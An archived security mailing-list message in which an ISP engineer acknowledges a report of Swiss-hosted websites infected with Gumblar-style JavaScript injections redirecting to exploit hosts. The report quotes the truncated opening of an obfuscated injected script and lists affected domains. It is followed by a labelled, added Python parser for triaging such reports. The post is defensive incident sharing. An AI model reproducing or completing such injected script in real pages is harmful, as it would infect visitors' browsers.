[nsp-sec] ACK 29222 gumblar-style infections
Jan Boogman
boogman at ip-plus.net
Wed May 12 14:28:19 EDT 2010
Proxy-Ack for AS29222
Jan
Swisscom IP-Plus Eng.
> ----------- nsp-security Confidential --------
>
> Hi,
>
> please find attached a list of web sites with javascripts/iframes redirecting
> to gumblar-style exploit hosts.
>
> An example injection looks like this:
> <script>this.v='';this.C=51578;this.C-=144;function W(){var
> j="j";k={};var M=document;try [.. truncated ..]</script><!--8c831cfc3501fade343bbf9c5d556620-->
>
> The format is:
> <ASN> | <IP> | <CC> | <hits> | <domain> | <sample URL> | <first seen> | <last seen> | <AS desc>
>
> kind regards, Dirk :.
>
> -----------------------------------------------------------------------------------------------
>
>
> 29222 | 84.16.81.52 | CH | 2 | transitmag.ch | http://transitmag.ch/ | Tue May 4 20:07:16 2010 | Tue May 4 20:07:28 2010 | INFOMANIAK-AS Infomaniak Network SA
> 29222 | 84.16.82.19 | CH | 1 | archipo.com | http://www.archipo.com/d616/ | Mon May 10 17:49:50 2010 | Mon May 10 17:49:50 2010 | INFOMANIAK-AS Infomaniak Network SA
> 29222 | 84.16.92.232 | CH | 13 | catsfoundation.org | http://www.catsfoundation.org/audit.php | Tue May 11 20:42:49 2010 | Tue May 11 20:44:33 2010 | INFOMANIAK-AS Infomaniak Network SA
>
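For a recipient who wants to triage a report in the pipe-delimited format quoted above, the following is an added example, not part of the original message or of any nsp-security tooling. It parses the records, rejects malformed lines, defangs the sample URL and aggregates per ASN and IP. The function names are hypothetical, and the sample records are constructed from documentation address space (AS64500, 192.0.2.0/24, `.example` domains).

```python
import ipaddress
from datetime import datetime
from typing import NamedTuple

TS_FORMAT = "%a %b %d %H:%M:%S %Y"  # matches "Tue May 4 20:07:16 2010"

class Hit(NamedTuple):
    asn: int
    ip: str
    cc: str
    hits: int
    domain: str
    url: str
    first_seen: datetime
    last_seen: datetime
    as_desc: str

def defang(url):
    """Make a URL non-clickable before it is pasted into a ticket."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

def parse_line(line):
    """Return a Hit, or None for anything that is not a well-formed record."""
    body = line.strip().lstrip("> ")           # drop e-mail quote markers
    f = [x.strip() for x in body.split("|")]
    if len(f) != 9:
        return None
    try:
        return Hit(int(f[0]), str(ipaddress.ip_address(f[1])), f[2].upper(),
                   int(f[3]), f[4].lower(), defang(f[5]),
                   datetime.strptime(f[6], TS_FORMAT),
                   datetime.strptime(f[7], TS_FORMAT), f[8])
    except ValueError:                          # bad ASN, IP, count or timestamp
        return None

def summarize(text):
    """Aggregate per (ASN, IP): total hits, domains, first and last sighting."""
    out = {}
    for hit in filter(None, map(parse_line, text.splitlines())):
        s = out.setdefault((hit.asn, hit.ip), {"hits": 0, "domains": set(),
                           "first_seen": hit.first_seen, "last_seen": hit.last_seen})
        s["hits"] += hit.hits
        s["domains"].add(hit.domain)
        s["first_seen"] = min(s["first_seen"], hit.first_seen)
        s["last_seen"] = max(s["last_seen"], hit.last_seen)
    return out

# Constructed sample: format header, two valid records, one with an invalid IP.
SAMPLE = """> <ASN> | <IP> | <CC> | <hits> | <domain> | <sample URL> | <first seen> | <last seen> | <AS desc>
> 64500 | 192.0.2.10 | CH | 2 | shop.example | http://shop.example/ | Tue May 4 20:07:16 2010 | Tue May 4 20:07:28 2010 | EXAMPLE-AS Example Hosting
> 64500 | 192.0.2.10 | CH | 13 | blog.example | http://blog.example/a.php | Tue May 11 20:42:49 2010 | Tue May 11 20:44:33 2010 | EXAMPLE-AS Example Hosting
> 64500 | 999.0.2.11 | CH | 1 | bad.example | http://bad.example/ | Mon May 10 17:49:50 2010 | Mon May 10 17:49:50 2010 | EXAMPLE-AS Example Hosting
"""
```
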